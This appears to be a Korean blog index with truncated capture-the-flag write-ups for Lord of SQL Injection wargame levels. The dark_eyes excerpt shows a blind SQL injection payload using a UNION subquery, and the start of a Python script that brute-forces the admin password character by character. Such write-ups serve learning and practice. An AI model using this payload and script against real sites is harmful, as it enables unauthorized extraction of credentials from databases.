전체 글
LOS hell_fire, evil_wizardWebHacking/Load Of Sql Injection 2018. 2. 18. 03:00
12345678910Sorry, this challenge is broken! (Thanks to @dohyeokkim)HELL_FIRE Clear!Colored by Color Scriptercs 1234567891011Sorry, this challenge is broken! (Thanks to @dohyeokkim)EVIL_WIZARD Clear!Colored by Color Scripter cs
LOS dark_eyesWebHacking/Load Of Sql Injection 2018. 2. 18. 02:58
123456789101112131415161718 Colored by Color Scriptercs 아까와 같은 error blind sql injection문제다. 이 문제에서는 union함수 특징을 이용하여서 문제를 풀수있다. 12345678910111213141516171819202122232425import urllib2 j = 1input_ = 33 #0passwd = '' while(True): url = 'https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw=\' or id=\'admin\' and (select 1 union select substr(pw,%d,1)=0x%x)' %(j,input_) url ..